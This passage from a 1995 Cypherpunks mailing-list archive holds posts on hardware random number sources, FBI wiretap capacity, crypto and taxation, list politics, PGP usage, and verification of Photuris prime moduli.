>that pressure, or other parameter variences, in turbulent flow could yield
>good random numbers. As a bonus, these parameters are easily measurable
>without special, exotic, equipment and should be inexpensive

Ignoring the work allegedly done on "chaotic encryption," the RF method
described above essentially is relying on turbulence: the atmospheric
variations ("spherics," "whistlers," are some of the buzz words) affect the
snowstorm. Also, the rabbit ear antennas move in response to room air
currents.

Again, all unpredictable. (And as I noted above, sampling strategy is
important...)

I  don't plan to belabor this point. Radioactive decay sources are
certainly fine, though not likely to be purchased by most people. (I have
nothing against radioactive decay, as some of you may know--it made my
career.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From llurch at networking.stanford.edu  Sat Nov  4 09:14:14 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 01:14:14 +0800
Subject: Telephone switch capacity -Reply
In-Reply-To: <s09a7458.054@allegro.net>
Message-ID: <Pine.ULT.3.91.951103182313.3366A-100000@Networking.Stanford.EDU>


[about the FBI supposedly wanting the ability to tap 1% of all phones in 
the US simultaneously]

EPIC, CDT, and the original source confirm that they're talking about
capacity, not total circuits. So what the FBI was asking for (not
demanding, certainly not dicatating) by early 1999 (not Oct 1998, because
the ticker starts at the end of the comment period) was between 0.25% and
1% of the 10-20% of lines that the phone system can handle at once, or
between 0.025% and 0.2% of the lines. 

Of course the FBI doesn't have the staff to listen to all these lines, and
they need an individual court order to authorize each individual
interception, so this numbers game is a bit of a joke. 

There is no controversy about the number of wiretaps that have been
authorized, except as manufactured by the Spotlight folks and other
conspiracy loons. The EPIC FOIA request and lawsuit concerns the rationale
for the FBI's capacity request. 

It all makes a little more sense now. I had been wondering what the hell
the FBI had been smoking. Something not quite as strong as the stuff the
Spotlight people are smoking, it turns out. 

The FBI proposal is still Not A Good Thing, and deserves your interest 
and opposition. See http://www.epic.org/privacy/wiretap/oppose_wiretap.html 
for facts and reasonable responses. The CDT's page, at 
http://www.cdt.org/digtel.html, is better.

-rich





From tcmay at got.net  Sat Nov  4 09:17:09 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:09 +0800
Subject: [political NON-noise] Re: Crypto & Taxes
Message-ID: <acc00b1210021004adbd@[205.199.118.202]>


At 1:03 AM 11/4/95, s1113645 at tesla.cc.uottawa.ca wrote:

>Not that I want to get into a big political discussion, but David Friedman
>has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
>which argues anarchism/libertarianism from an economist'spoint of view.
>The argument is not cased in terms of ethics and morals but rather
>economic efficiency and utility. Slim, easy to read and cheap. He also
>has a good sense of humor. Unfortunately the book is currently on back order.
>I'm holding on to my library copy until they ship one to me.

David Friedman is now teaching law at Santa Clara University, over in
Silicon Valley. We've been in contact, and expect to meet for dinner
sometime soon. (He attended a special Cypherpunks meeting a few years ago.)

>You can butt heads with him and Tim on the cyberia list (I don't remember
>the address but they have it at news://nntp.hks.net )

Ah, but the Cyberia list is a _law_ list, and political discussion is
discouraged.

>I gather from the cyphernomicon that someone recently converted him to
>cryptoanarchy.

His "Machinery of Freedom" and many other articles clearly establishes him
as a leader in this area. He didn't previously know a lot about strong
crypto, but now he sees that this makes many of the abstract ideas of
"Machinery" near at hand.

Vernor Vinge believes the same thing.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Sat Nov  4 09:17:28 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:28 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <acc005a10e02100466ac@[205.199.118.202]>


At 10:35 PM 11/3/95, hallam at w3.org wrote:

>        Just a calibration point. The libertarians on the list do not seem
>to shrink from expressing their political views. Indeed the entire discussion
>on the NSA is a political thread pure and simple. My post related directly
>to the question of personal privacy rights in a democratic, plural society.
>I do not regard that it was off topic in any sense. I was not aware that
>any agreement was in effect as to the method by which goals might be
>achieved. I chose to persue goals by the means most likely to succeed. In
>that I am a pragmatist. Government regulation often provides social benefits
>it is not by definition an evil to be avoided. In any case regardless of the
>rhetoric government regulation increases, I prefer to press for some
>regulations I like rather than dream about there being none whatsoever.

I for one have no problem with left-leaning (that is, nonlibertarian :-})
folks expressing views. That libertarians tend to be the most vocal and
perhaps most articulate advocates of strong crypto is only a trend: I know
of several left-leaning folks who strongly push crypto. We happen to
disagree on some points, but agree on others. On this list, Dave Mandl and
Rich Dutcher (probably no longer subscribed) have represented somewhat
leftist views.

The late John Brunner was a particular favorite of mine, whose "Stand on
Zanzibar" was an utter masterpiece, and whose "The Shockwave Rider" was of
course a major influence on many cyberspace privacy advocates. And yet he
called himself a leftist and was strongly opposed to the corporate state.

As I am, by the way. Much of the power of very large corporations comes
from the power of the State enforcing certain franchises and monopolies
granted to them. (Intellectual property laws are largely such
franchises---if one doubts this, imagine a return to the era of the guilds,
where the silversmith's guild could physically block other people from
smithing silver, and so on for all of the guilds. Modern intellectual
property law works mostly the same way, giving to Apple or Sun or Intel the
control a "truly free" market certainly would not.)

>        I do not separate the question of politics from technology. My
>reasons for working on the Web have from the start been explicity political.
>I regard the persuit of technology without consideration of the political
>consequences to be unethical.

I agree. And though I have been called an "ethical monster" for pushing my
agenda for crypto anarchy, I agree that one must always consider ethics and
politics in technological matters. (I suspect we disagree about many
conclusions of this view, however.)

>        I am only in a position to influence the political process if I
>understand the position of the administration and can demonstrate an
>appreciation of their concerns. As Sun Tsu said "you must build a golden
>path along which your enemies may retreat". The problem with government
>is not that it is a conspiracy, it is an interlocking series of
>beuraucracies which all seek to avoid responsibility.

I view governments as just another example of an organism or system which
perpetuates itself. It's in the genes. Evolutionary game theory, etc.

>        If you want to get Phil Z. off the hook or foul up the governments
>escrow scheme plans you have tobe prepared to step into their mindset
>and walk about on the inside a bit. somewhere inside the government there is
>a jobsworth who is deciding to hassle Phil Z., this person will be a civil
>servant, not a political appointee. Ie the dregs which get left behind each
>time there is a new administration. What we need to do is to identify that
>person and nail their ass to the wall. It has to become apparent to the
>administration that that individual has created an unnecessary source of
>embarassment.

This I think we have been already been doing a pretty good job at. I have
been on panel discussions with Stewart Baker, former chief counsel of the
NSA (and now with Steptoe, a D.C. law firm, and still active in pushing
crypto legislation), and Ron Lee, the current chief counsel. And I spotted
Dorothy Denning's deep involvement several years ago. Ditto for key escrow.


And of course John Gilmore, Phil Karn, and others have been very active in
"nailing their asses to the wall," so to speak.

>        If somone makes contiuous political spiels themselves but object when
>I make one they disagree with (as one person has done) I am not going to take
>their objection as indicating anything other than an inability to argue their
>case.

As this post should make clear, I certainly don't object.

I doubt I'll have any energy to argue things I argued for the first time
almost 30 years ago, but I'm very interested in the nuts and bolts of how
strong crypto will affect institutions and policies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Sat Nov  4 09:41:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:41:51 +0800
Subject: Sources of randomness
Message-ID: <acc0dca515021004eb09@[205.199.118.202]>


At 8:04 AM 11/4/95, Peter Monta wrote:

>Perhaps there ought to be a couple of standard random-bit-source
>implementations, say at the CMOS-standard-cell and board-subsystem
>levels, that are widely vetted and trusted (and used!).  But it's
>mostly a solved problem, seems to me.

This is something John Gilmore called for when he wrote:

At 9:50 PM 9/20/95, John Gilmore wrote:
>Software-generated random numbers are likely to be of poor quality.
>There just isn't that much true randomness visible to computers.
>Several ways to build good hardware random number generators are
>known.  But before hardware random number generators can be
>incorporated into common desktop computers, someone will have to put
>them into a small fraction of a chip.
>
>Currently, random number generators are chips or larger circuits.
>Nobody will pay to put these on a motherboard.  But if a random number
>generating circuit occupied 1/1000th of a CPU chip or "multi-function
>I/O" chip, cost would not be a reason to leave it out.
>
>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.
>
>Do we know any solid state physics / circuit design experts who think
>this might be a fun thing to do?  I bet you could get a paper out of
>it.  And probably improve the world a few years later, when companies
>used your paper to close another hole in their computer security.
>
>        John

There were several other posts in this thread, so interested folks might
want to check the archives for this time period.

Continuing on with Peter Monta's post:

>A radioactive source might be okay at the board level (though probably
>costlier than its electronic counterpart), but it'd be a pain to
>integrate, and it might disturb the rest of the chip.  (I'd like to
>have a get_random_bit instruction as part of a microprocessor, for
>example.)  Also if you want a high rate of random bits, you need many
>decay events, whereas for electronic sources the corresponding
>bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

I agree, for several reasons. First, I agree that electronic noise sources
are easy to build, easy to get licenses for use (basically, no licenses,
unless the ITAR boys decide random number generators are munitions--maybe
the "This t-shirt is a munition" could have "export-controlled dice"?

Second, the ease of integration as a standard library module.

However, getting the chip companies to do this will not be easy. They
generally don't see the need (hey, even _we_ don't, given the diverse
opinions on what is needed).

This is why many of us favor an external dongle that plugs in somewhere.
Then it could be sold cheaply and not have to get "buy-ins" from industry
and committees.

One idea is something that superficially looks like a modem, as everyone
has modem software and ports (though I suppose many people use internal
modems and so can't easily access it.) One would attach the "RNG-modem," a
little dongle, and grab noise into a buffer for processing (hashing,
filtering, etc.), or as ASCII garbage.

(Before anyone jokingly asks about "1-800-RANDOMS," I've thought of it. Not
practical, for obvious reasons.)

A purer approach would be just a noise source dumped into dev/random, or
whatever one wishes to call it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From llurch at networking.stanford.edu  Sat Nov  4 10:07:32 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 02:07:32 +0800
Subject: [NOISE] Re: 800_ape
In-Reply-To: <199511041323.IAA16916@pipe1.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951104095757.6549A-100000@Networking.Stanford.EDU>


On Sat, 4 Nov 1995, John Young wrote:

>    11-5-95. NYPaper Sunday Magazine:
> 
>    "Making Microsoft Safe For Capitalism. How do you restrain
>    an 800-pound gorilla?" Cover story. By James Gleick.
> 
>       'Anything not a direct lie or clearly illegal is O.K. to
>       do if it advances Microsoft's tribal cause,' Mitchell
>       Kapor says. 'This licenses the worst sort of
>       manipulations, lies, tortured self-justification and so
>       on.'

Mitch is incorrect. Microsoft considers direct lies to be OK. Witness the 
handling of the SMB security bugs.

I'm putting together a "Windows 95 Frequently Unanswered Questions File."

-rich





From cjl at welchlink.welch.jhu.edu  Sat Nov  4 10:10:04 1995
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Sun, 5 Nov 1995 02:10:04 +0800
Subject: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID: <Pine.SOL.3.91.951103170926.6180A-100000@welchlink.welch.jhu.edu>


On Fri, 3 Nov 1995, Dr. Frederick B. Cohen wrote:


> 
> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it.  I know people who have
> experienced these visitations and felt highly constrained as a result.



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl at welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )






From futplex at pseudonym.com  Sat Nov  4 10:16:09 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 02:16:09 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511032022.PAA03575@ducie.cs.umass.edu>


> >Specifically, if HTTP transactions with
> >a popular web server were routinely encrypted, then all reasonably long
> >visits to that site would act as cover traffic for a message pool on that
> >server.
> 
> Qua?  The "length" of the visit is just the time to download a document.
> Leaving a page in the browser window doesn't generate traffic...

You're absolutely right. I wasn't thinking sensibly about HTTP.  I wanted to
make an argument about the time it would take to search the pool and serve a
results page. But upon reflection, I don't think that even holds up under my
HTTP delusions of yesterday, let alone a realistic view. Please ignore the
"reasonably long" part of my previous statement. Thanks for pointing that out.

-Futplex <futplex at pseudonym.com>





From clarkm at cnct.com  Sat Nov  4 10:53:55 1995
From: clarkm at cnct.com (clarkm at cnct.com)
Date: Sun, 5 Nov 1995 02:53:55 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511030810.AA0038@cnct-gw.new-york.net>


Thanks for this item!  Two little excerpts jump out at me.  They follow:

> Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
> percent

[snip]

> "People are starting to say that seems awfully high," Dempsey said, noting 
> that
> the overall level of such surveillance activity is now a total of 20,000 
> to 25,000
> intercepts nationwide over an entire year.

So what is it?  1,154 wiretaps?  Or 20,000?

FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
for the data to support those numbers.  The FBI refused to release them 
until the year 2002.

The FBI is being sued under FOIA to support Freeh's sworn testimony.  (Of
course, he used different numbers at different times....)

One last thing.

What's so special about the year 2002?  

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews at paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     





From stewarts at ix.netcom.com  Sat Nov  4 10:58:28 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 02:58:28 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
Message-ID: <199511030524.VAA03406@ix5.ix.netcom.com>


A couple of weeks ago, Michael Froomkin <froomkin at law.miami.edu> wrote:
>> > fully applied crypto (e. g. fully anonymous digital cash) 
>> > makes it essentially impossible to base a tax system on income.

>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
>by people as well as EARNED by people.  Most payers have easily 
>detectible physical presence and assets that can easily be attached by 
>regulators.   It will be a cold day before, e.g., my employer agrees not 
>to report my earnings.  And the same is true for most employers in most 
>industries.  

Unfortunately, this is true, at least for people whose employers are
subject to income tax somewhere.  Taxing businesses doesn't make sense
economically - you could collect almost as much money with far less disruption
to the underlying economy by taxing it as wages for workers and
dividend or interest payments to owners* rather than inside the business itself,
substantially reducing the accounting workload of businesses**.
But it's still very attractive to governments, not only as a lever for
implementing social policy and extracting cooperation, but as a critical tool
to force businesses to report wages payed to employees - I don't know if
law.miami.edu is a taxable business, but for most employers, if they don't
report the wages they paid to their employees, but do report all their
revenue, they get taxed on the additional profit, instead of the employee
getting hit with the tax; most people I know who've been paid "under the table"
have been working for small businesses that are also not reporting cash
revenues.

Of course, if a business isn't _spending_ money on employees, but is just
contracting for work performed by an Anguillan corporation, they still have
receipts for expenses, and the financial arrangements between the Anguillan
corporation and any of its US employees aren't really their concern....

>And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
>So the line about death and taxes remains as true as ever, crypto or no.

Value is really hard to measure in a service economy.   Most of my work over
the last N years has been talking to people, typing on keyboards,  
going places on airplanes to talk to other people and type on other keyboards,
and occasionally handing people piles of collated and stapled dead trees,
a racket for which people pay my employer lots of money***.  Where's the value?
When was it added?  If the Tax Collectors don't see people handing my employer
lots of money, can they demonstrate how much money they can confiscate?



- - - - - -

* this misses payments to foreign owners and taxes on foreign customers,
but any government foolish enough to discourage investment by foreigners
and sales to foreign customers deserves to be blamed heavily for lost jobs..

** US businesses spend approximately 40% as much calculating taxes as they
do _paying_ them...

*** My previous employer was very good at taking metal, sand, and fermented
dinosaur parts, and shaping them into boxes and strings that people would 
give them money for; they were extremely optimistic that they could get lots
of people to also pay them money for sending them people to talk about boxes
and strings and getting other people to pay _them_ for talking and banging
on keyboards.  They shouldn't have been quite so optimistic, and now
I'm in the racket on my own, having not yet acquired overseas corporations
to shelter my income through :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From anon-remailer at utopia.hacktic.nl  Sat Nov  4 11:09:06 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 5 Nov 1995 03:09:06 +0800
Subject: The Crypto Applications we would rather not talk about
Message-ID: <199511041900.UAA27770@utopia.hacktic.nl>





     Anonymous remailer and PGP
     Unusual applications

I dont know if anyone else caught it last year
but High Times discovered anonymous remailers
and PGP for an article last year for
anonymous remote control of grow rooms.

PGP Wins again?


and lately the thule people(bigoted and racist Nazis)
have been learning to protect themselves also
according to news reports from germany.

Crypto and Privacy tools protect everyone
from the hero to the anti-hero...

   the technology itself is neutral

I wonder how long it will be before we hear news reports
of some of the governments people being caught using
internet casinos from the white house network.


On other notes CCCF(the chaos computer club France)
was shown to have had a high level plant from
the french intel services, The founder of the CCCF
himself.
   this story seems to repeat itself over and over
when you are doing something of which the authorities DONT
approve they WILL attempt to infiltrate and subvert from the
inside. 

    The answers are there and have been published
in most books on tradecraft, 3 person cells organized
as pyramids. Anonymous remail tech and crypto
make this system possible with out Face to face contact.
When does this lesson finally get learned?


    anon





From tcmay at got.net  Sat Nov  4 11:46:48 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 03:46:48 +0800
Subject: Cypherpunks Santa Cruz Meeting/Party, 95-11-11
Message-ID: <acc0ff391c0210040aca@[205.199.118.202]>



I have sent out a detailed announcement of a "Cypherpunks Santa Cruz"
meeting/party at my house in Corralitos, California, on Saturday, 11
November.

This was sent to the mailing list of interested folks I maintain. If you
are on this list, you already got the detailed message. If you are
interested in getting on the list, drop me a line. I can also send the
detailed announcement to anyone who is interested.

As background, the Cypherpunks Santa Cruz is for folks in the Santa Cruz,
Monterey, Carmel, Boulder Creek, Watsonville, Salinas, Big Sur, etc. area,
or for anyone else on the Central Coast. Or anyone else, for that matter.
At the last (and first) party we had Greg Broiles down from Eugene, Oregon,
and Jeff Simmons up from San Luis Obispo, plus a bunch of folks from "over
the hill" in the Silicon Valley/Bay Area. All told, 25 people.

I'm not sure if there is a Bay Area meeting that day. If so, attend one or
the other, or both, as my party starts late afternoon (of course, it may be
a long drive, depending on where the Bay Aryans are meeting).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From perry at piermont.com  Sat Nov  4 11:54:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 5 Nov 1995 03:54:30 +0800
Subject: Sources of randomness
In-Reply-To: <199511040804.AAA03552@mage.qualcomm.com>
Message-ID: <199511041945.OAA06613@jekyll.piermont.com>



Peter Monta writes:
> But how wrong is wrong?  Unless the design is catastrophically bad,
> a zener source is going to give you zener noise plus some slight
> admixture of interference.  Say the designer is extremely careless
> and there's deterministic interference 20 dB down.  I don't see
> how even that matters cryptographically---the resulting loss in
> entropy will be millibits per sample.

[lots elided]

As a smart EE, its very easy for you to personally understand the
design of a device you have personally constructed well enough that
you can trust it. On the other hand, consider a black box Johnson
noise based device that you are handed. You check the random numbers
coming out; they seem roughly right. You know, of course, that the box
could simply be a very clever Blum-Blum-Shub based PRNG with the seed
being stored at the enemy's secret lab, and you wouldn't have any
solid handle on how to determine that without taking the device apart.

On the other hand, I can take a radiation detector and test it damn
easily with easy to aquire calibrated sources.

> A radioactive source might be okay at the board level (though probably
> costlier than its electronic counterpart), but it'd be a pain to
> integrate, and it might disturb the rest of the chip.

Certainly you can't put such a device into a portable phone -- a Zener
diode beats a geiger counter in such cases. On the other hand, a
portable phone has to deal with a threat model in which there are very
simple ways -- like plain eavesdropping -- to hear the
conversation. If, though, you have a large electronic bank's central
key management machine in mind, the extra trouble of using an external
radiation detector would probably be worthwhile, assuming you had
plugged other holes, given the ease with which the system may be
tested and the amount of cash at stake.

Perry





From don at cs.byu.edu  Sat Nov  4 12:06:10 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sun, 5 Nov 1995 04:06:10 +0800
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511041954.MAA00210@wero.byu.edu>


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai <weidai at eskimo.com> writes:

>I am still talking to RSADSI's lawyers, but it's taking a lot longer 

And the efforts are appreciated. Of course, your original efforts can
still be appreciated at utopia.hacktic.nl. 

I don't know about everyone else, but that TCP encryption sounded
interesting. Any plans to discuss it on the list? 

- -----

An anonymous complainer writes:

>Well, Perry, my opinion is that there is far too much noise on this list 
>as it is.  I have already seen my words drowned out by bellyaching over 
>next to nothing.

POT-KETTLE-BLACK.

Also, since nothing you've written (in your commentary, as opposed to
anonymous announcements or releases that most people use anonymity for
here) indicates that you're using anonymity for any particular reason,
please stop so people can killfile you. Or send it from a nym at
alpha.c2.org. I mean, the NSA has your real name anyway, what's the
point... 

- ---------

Jay Campbell <edge at got.net> writes:

>>masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
>>                            ^^^^^^
>>I think you'll find the NSA was not in existence in the 1800's.

>I'm disappointed at the sheer number of similar pieces of email I received
>on this. You'da thought the Capn Crunch reference was silly enough that
>people would give me a funny look and trash the original message.

Hmm, I guess most of them at least had the sense to not send it to the
list. The list still sees FAR too many personal queries and rebuttals. TO
THE GUILTY: take your bonehead replies to email please.

Jay: I had a similar experience when I mentioned elsewhere that all the
primes under 1000 digits were really invented by the NSA over 20 years
ago. I recommended wearing garlic around the neck for protection... 

Everyone: This 1% wiretap thing is getting old. Hint hint hint

- ----

Lastly, regarding cpunk icons, the only ones I was able to find were at
the BAP site. I've been drawing a few of my own, one of them is done. It's
a yellow diamond that says Cypherpunk on Board. And it has the anarchy-A-
inside-a-C symbol. It's interlaced and transparent, so it doesn't look too
bad. You're all welcome to steal it at http://students.cs.byu.edu/~don.
Also working on a PGP icon. BAP has an envelope with PGP being the seal. I
was thinking maybe a deadbolt ("PGP") with the inscription "Mommy said to
lock the doors at night" or some kind of safety lock-your-doors or
lock-your-data reference. 

For the time being I'm working on a simple PGP/ZLDF icon, it will be
on my page Real Soon Now[tm]. If you like my icons please tell me.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJvC7sLa+QKZS485AQFrIgL/VuRfkh7i+K3W3bLyep26riXdZgIVC557
RRcHf9VcacXOGyVvT03JESqNxV/XRcW2k8WDQ+fwhMDEHbHjkzWT5fUxXm6knRGc
K0drBF8WlW0ZobEaiU7SgEnVjus5kFj4
=iAr6
-----END PGP SIGNATURE-----
<don at cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root at 127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *





From markm at omni.voicenet.com  Sat Nov  4 12:41:32 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Sun, 5 Nov 1995 04:41:32 +0800
Subject: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <Pine.LNX.3.91.951104032833.116A-100000@localhost>


On Sun, 5 Nov 1995, amp wrote:
 
> greetings c-punks,
> 
> i may have posted this at some time in the past, as i have asked it
> elsewhere and gotten different responses. i'm interested in that the
> folx here think about it though, so here it is...
> 
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.)
> 
> i'd like to know if there was a reason not to use the output of pgp
> to do it. i've been playing with the following method. i take a file
> and encrypt it to a key with the '-a' flag on. this generates an
> ascii file that is easily editable using simple, standard rexx calls.
> i strip the first 20 or so lines and the last 20 or so lines
> and put the resulting file aside. then i perform the same operation
> again and append the file to the previous result. i repeat until the
> file is sufficiently large for my purposes and then give the
> resulting file to the person(s) i want to have it.

There is a way to make a file with random contents using PGP.  Just type
pgp +makerandom=xxx file.ext where xxx is the size of the file you want to
create.  I would not advise using this or other methods using a pseudo-
random number generator.
 
> i would think that the output of pgp should be pretty darn random. if
> it isn't, then it's usefulness is less than its reputation imo. as
> you can tell if you've read this far, i'm not a cryptographer. i just
> like the stuff and am working to become more proficient in its use as
> i think it is important if we are to maintain our privacy in an
> increasingly digital world.

The random output of PGP is pretty random but when the output is used to
generate very large OTP's, patterns will no doubt exist.  Hardware RNG's
are still the best. 

`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/





From bsimpson at morningstar.com  Sat Nov  4 13:02:18 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Sun, 5 Nov 1995 05:02:18 +0800
Subject: Photuris Primality verification needed
Message-ID: <1972.bsimpson@morningstar.com>


Folks, I was somewhat disappointed in the response to our previous
requests for verification of the strength of the prime moduli.

Recently, someone asked for a smaller prime of only 512-bits for speed.
This is more than enough for the strength of keys needed for DES, 3DES,
MD5 and SHA.  Perhaps this would be easier to have more complete and
robust verification as well.

Here are two "important" primes for Photuris use.  If you have some
spare cycles, it would be beneficial for in-depth verification of these
strong primes.

Implementation Optional.  A 512-bit strong prime (p), expressed in hex:

   da58 3c16 d985 2289 d0e4 af75 6f4c ca92
   dd4b e533 b804 fb0f ed94 ef9c 8a44 03ed
   5746 50d3 6999 db29 d776 276b a2d3 d412
   e218 f4dd 1e08 4cf6 d800 3e7c 4774 e833

The recommended generator (g) for this prime is 2.


Implementation Required.  A 1024-bit strong prime (p), expressed in hex:

   97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
   dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
   2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
   b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6

   5e55 4313 828d a83b 9ff2 d941 dee9 5689
   fada ea09 36ad df19 71fe 635b 20af 4703
   6460 3c2d e059 f54b 650a d8fa 0cf7 0121
   c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.


> From: Phil Karn <karn at qualcomm.com>
> I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
> 1.3.2 to test this number. This function uses the Miller-Rabin primality test.
> However, to increase my confidence that this number really is a strong prime,
> I'd like to ask others to confirm it with other tests.
>

Bill.Simpson at um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2





From black at eng.usf.edu  Sat Nov  4 13:19:52 1995
From: black at eng.usf.edu (James Black)
Date: Sun, 5 Nov 1995 05:19:52 +0800
Subject: using PGP only for digital signatures
Message-ID: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>


Hello,
  I am in a discussion (during the week) with a system administrator 
about seeing if we can just make PGP publically available to everyone, 
but now the discussion seems to be to just allow PGP to do digital 
signatures, and I don't think that is the best choice, then.  They are 
not against PGP being used, but there are legal issues as to whether they 
can offer it to everyone, as some students are international students, 
and are not allowed to use the version for the US, or so I have been 
informed, so now I need to see if we can have the international version, 
so these students can use it. :(
  Is there any good programs (for the Unix, SunOS) that just does digital 
signature encryption?  What they are trying to do is make certain that no 
one can send a message to anyone, claim to be in the faculty, and cause 
problems that way.  My position is just a student programmer, but I am 
trying to learn as much as I can, to answer questions and deal with problems.
  Thanx.

James Black
black at suntan.eng.usf.edu





From tcmay at got.net  Sat Nov  4 13:30:00 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 05:30:00 +0800
Subject: video as a source of public randomness
Message-ID: <acbf9287090210045bcb@[205.199.118.202]>


At 5:08 PM 11/3/95, Perry E. Metzger wrote:
>Timothy C. May writes:
>> I  don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitzation equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
 ^^^^^^^^^^^^^^^^
>people. The geiger counters are very simple and cheap, too.


It is not correct to call this my "suggestion." I was responding to a
previous post by Andrew Isaacson who said: "How useful would it be to use a
video stream as a source of random input to something like /dev/random?
I'm thinking along the lines of a Connectix QuickCam (sp?) or the cool
videocam that comes with the Indy...."

